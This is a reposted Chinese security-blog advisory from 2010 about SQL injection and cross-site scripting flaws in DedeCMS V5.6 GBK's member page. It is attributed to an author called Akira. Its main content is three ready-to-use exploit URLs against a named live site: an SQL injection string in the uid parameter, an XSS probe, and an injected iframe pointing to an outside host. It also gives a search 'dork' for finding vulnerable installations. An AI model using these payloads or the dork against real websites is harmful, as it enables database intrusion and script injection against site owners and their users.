［zz］DEDECMS V5.6GBK 版本注入漏洞

首页 > 漏洞代码 > ［zz］DEDECMS V5.6GBK 版本注入漏洞

［zz］DEDECMS V5.6GBK 版本注入漏洞

2010年4月12日 admin 2,268 views 发表评论阅读评论

DEDECMS终于要发布5.6了,期待ing…没办法下到程序,就去做了个黒盒测试,
暂时也没办法分析更多…
嗯,.
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
测试站点:http://zz.5u.cn
============================================= | # Title : DEDECMS V5.6 GBK SQL injection Vulnerability | # Author : Akira | # email : MCAkira@HotMail.CoM | # Home : [url]http://www.hackclub.net[/url] | # Web Site : [url]http://zz.u5.cn[/url] | #Download: [url]http://www.dedecms.com[/url] | # Dork : Powered By DEDECMS.COM © 2004-2010 DEDECMS Inc. | # Tested on: Microsoft Windows XP SP2 + Lunix (debian 5.0) | # Bug :SQL injection ,XSS ==================== Exploit By Akira================

http://zz.5u.cn/member/index.php?uid=’%20||%20”%20||%20′%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe’”)/>

http://zz.5u.cn/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7′”><iframe%20src=http://www.milsec.net>

分类: 漏洞代码标签: DEDECMS, SQL Injection, Vulnerability, xss

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

老外整理的渗透测试工具使用metasploit收集邮箱

0x50sec.org

［zz］DEDECMS V5.6GBK 版本注入漏洞

Categories

Blogroll

最热博文

博文存档